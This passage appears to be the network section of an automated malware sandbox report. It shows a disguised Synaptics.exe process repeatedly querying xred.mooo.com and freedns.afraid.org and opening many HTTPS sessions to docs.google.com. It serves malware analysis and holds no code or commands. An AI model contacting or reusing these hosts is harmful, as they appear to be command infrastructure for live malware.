                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                        May 17, 2022 13:31:21.130645037 CEST192.168.2.38.8.8.80x11dbStandard query (0)s.360.cnA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:22.881264925 CEST192.168.2.38.8.8.80x8ce6Standard query (0)st.p.360.cnA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.008301020 CEST192.168.2.38.8.8.80x7146Standard query (0)tr.p.360.cnA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.026559114 CEST192.168.2.38.8.8.80x78afStandard query (0)agt.p.360.cnA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.539249897 CEST192.168.2.38.8.8.80xc223Standard query (0)docs.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:26.034451008 CEST192.168.2.38.8.8.80x4e2bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:28.656028032 CEST192.168.2.38.8.8.80x77e3Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:31.815556049 CEST192.168.2.38.8.8.80x58d8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:33.059660912 CEST192.168.2.38.8.8.80x861fStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:35.509466887 CEST192.168.2.38.8.8.80x7a3Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:36.731329918 CEST192.168.2.38.8.8.80xb801Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:39.107177973 CEST192.168.2.38.8.8.80xcb9dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:40.281155109 CEST192.168.2.38.8.8.80x9fe8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:42.629704952 CEST192.168.2.38.8.8.80xf9c7Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:44.291758060 CEST192.168.2.38.8.8.80xd14Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:46.667797089 CEST192.168.2.38.8.8.80xd6d4Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:47.986789942 CEST192.168.2.38.8.8.80x6e48Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:50.386435986 CEST192.168.2.38.8.8.80xa92dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:51.571439981 CEST192.168.2.38.8.8.80xe115Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:53.897166014 CEST192.168.2.38.8.8.80x5d08Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:55.064049006 CEST192.168.2.38.8.8.80xd37cStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:57.397142887 CEST192.168.2.38.8.8.80x1bf5Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:58.585808992 CEST192.168.2.38.8.8.80x921eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:00.945209026 CEST192.168.2.38.8.8.80x252Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:02.129443884 CEST192.168.2.38.8.8.80x7851Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:04.537597895 CEST192.168.2.38.8.8.80xd502Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:05.728209972 CEST192.168.2.38.8.8.80x6f9dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:08.118043900 CEST192.168.2.38.8.8.80xb403Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:24.205642939 CEST192.168.2.38.8.8.80x7ad4Standard query (0)agd.p.360.cnA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:24.207762957 CEST192.168.2.38.8.8.80x38cfStandard query (0)pinst.360.cnA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.204087973 CEST192.168.2.38.8.8.80x38cfStandard query (0)pinst.360.cnA (IP address)IN (0x0001)

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                        May 17, 2022 13:31:21.310791969 CEST8.8.8.8192.168.2.30x11dbNo error (0)s.360.cn171.8.167.89A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:21.310791969 CEST8.8.8.8192.168.2.30x11dbNo error (0)s.360.cn180.163.251.231A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:21.310791969 CEST8.8.8.8192.168.2.30x11dbNo error (0)s.360.cn180.163.251.230A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:21.310791969 CEST8.8.8.8192.168.2.30x11dbNo error (0)s.360.cn171.8.167.90A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:21.310791969 CEST8.8.8.8192.168.2.30x11dbNo error (0)s.360.cn180.97.63.237A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:21.310791969 CEST8.8.8.8192.168.2.30x11dbNo error (0)s.360.cn171.13.14.66A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.194958925 CEST8.8.8.8192.168.2.30x8ce6No error (0)st.p.360.cn1.192.136.170A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.345601082 CEST8.8.8.8192.168.2.30x78afNo error (0)agt.p.360.cn1.192.136.132A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.345601082 CEST8.8.8.8192.168.2.30x78afNo error (0)agt.p.360.cn1.192.136.133A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr.p.360.cntr-b.p.360.cnCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr-b.p.360.cn180.163.229.168A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr-b.p.360.cn180.163.230.245A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr-b.p.360.cn180.163.230.244A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr-b.p.360.cn1.192.136.132A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr-b.p.360.cn1.192.136.133A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr-b.p.360.cn1.192.136.134A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.470870018 CEST8.8.8.8192.168.2.30x7146No error (0)tr-b.p.360.cn1.192.136.135A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:23.566926956 CEST8.8.8.8192.168.2.30xc223No error (0)docs.google.com142.250.186.46A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:26.052664995 CEST8.8.8.8192.168.2.30x4e2bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:28.675216913 CEST8.8.8.8192.168.2.30x77e3No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:31.834594011 CEST8.8.8.8192.168.2.30x58d8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:33.078521013 CEST8.8.8.8192.168.2.30x861fName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:35.528561115 CEST8.8.8.8192.168.2.30x7a3Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:36.748384953 CEST8.8.8.8192.168.2.30xb801Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:39.124074936 CEST8.8.8.8192.168.2.30xcb9dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:40.299922943 CEST8.8.8.8192.168.2.30x9fe8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:42.649905920 CEST8.8.8.8192.168.2.30xf9c7Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:44.309257030 CEST8.8.8.8192.168.2.30xd14Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:46.686369896 CEST8.8.8.8192.168.2.30xd6d4Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:48.005572081 CEST8.8.8.8192.168.2.30x6e48Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:50.405781031 CEST8.8.8.8192.168.2.30xa92dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:51.588901997 CEST8.8.8.8192.168.2.30xe115Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:53.914927006 CEST8.8.8.8192.168.2.30x5d08Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:55.083386898 CEST8.8.8.8192.168.2.30xd37cName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:57.422528028 CEST8.8.8.8192.168.2.30x1bf5Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:31:58.609818935 CEST8.8.8.8192.168.2.30x921eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:00.964720011 CEST8.8.8.8192.168.2.30x252Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:02.146461964 CEST8.8.8.8192.168.2.30x7851Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:04.556405067 CEST8.8.8.8192.168.2.30xd502Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:05.747066021 CEST8.8.8.8192.168.2.30x6f9dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:08.137310028 CEST8.8.8.8192.168.2.30xb403Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:24.520462990 CEST8.8.8.8192.168.2.30x7ad4No error (0)agd.p.360.cn119.188.66.33A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.848829985 CEST8.8.8.8192.168.2.30x38cfNo error (0)pinst.360.cnsoftm.update.360safe.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.848829985 CEST8.8.8.8192.168.2.30x38cfNo error (0)softm.update.360safe.comseupdate.360qhcdn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.848829985 CEST8.8.8.8192.168.2.30x38cfNo error (0)seupdate.360qhcdn.com111.13.65.25A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.848829985 CEST8.8.8.8192.168.2.30x38cfNo error (0)seupdate.360qhcdn.com111.13.65.27A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.848829985 CEST8.8.8.8192.168.2.30x38cfNo error (0)seupdate.360qhcdn.com111.13.65.20A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.983365059 CEST8.8.8.8192.168.2.30x38cfNo error (0)pinst.360.cnsoftm.update.360safe.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.983365059 CEST8.8.8.8192.168.2.30x38cfNo error (0)softm.update.360safe.comseupdate.360qhcdn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.983365059 CEST8.8.8.8192.168.2.30x38cfNo error (0)seupdate.360qhcdn.com111.13.65.20A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.983365059 CEST8.8.8.8192.168.2.30x38cfNo error (0)seupdate.360qhcdn.com111.13.65.25A (IP address)IN (0x0001)
                                                                                                                                                                                        May 17, 2022 13:32:25.983365059 CEST8.8.8.8192.168.2.30x38cfNo error (0)seupdate.360qhcdn.com111.13.65.27A (IP address)IN (0x0001)

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • docs.google.com
                                                                                                                                                                                        • freedns.afraid.org

                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        0192.168.2.349732142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        1192.168.2.349733142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        10192.168.2.349745142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        100192.168.2.349855142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        101192.168.2.349856142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        102192.168.2.349857142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        103192.168.2.349858142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        104192.168.2.349860142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        105192.168.2.349861142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        106192.168.2.349863142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        107192.168.2.349864142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        108192.168.2.349865142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        109192.168.2.349866142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        11192.168.2.349746142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        110192.168.2.349867142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        111192.168.2.349868142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        112192.168.2.349869142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        113192.168.2.349871142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        114192.168.2.349872142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        115192.168.2.349874142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        116192.168.2.349875142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        117192.168.2.349876142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        118192.168.2.349877142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        119192.168.2.349878142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        12192.168.2.349747142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        120192.168.2.349879142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        121192.168.2.349880142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        122192.168.2.349881142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        123192.168.2.349882142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        124192.168.2.349883142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        125192.168.2.349885142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        126192.168.2.349886142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        127192.168.2.349887142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        128192.168.2.349888142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        129192.168.2.349889142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        13192.168.2.349748142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        130192.168.2.349890142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        131192.168.2.349891142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        132192.168.2.349892142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        133192.168.2.349894142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        134192.168.2.349896142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        135192.168.2.349898142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        136192.168.2.349899142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        137192.168.2.349900142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        138192.168.2.349901142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        139192.168.2.349902142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        14192.168.2.349749142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        140192.168.2.349903142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        141192.168.2.349904142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        142192.168.2.349905142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        143192.168.2.349907142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        144192.168.2.349908142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        145192.168.2.349909142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        146192.168.2.349910142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        147192.168.2.349911142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        148192.168.2.349912142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        149192.168.2.349913142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        15192.168.2.349750142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        150192.168.2.349914142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        151192.168.2.349915142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        152192.168.2.349916142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        153192.168.2.349918142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        154192.168.2.349921142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        155192.168.2.349922142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        156192.168.2.349924142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
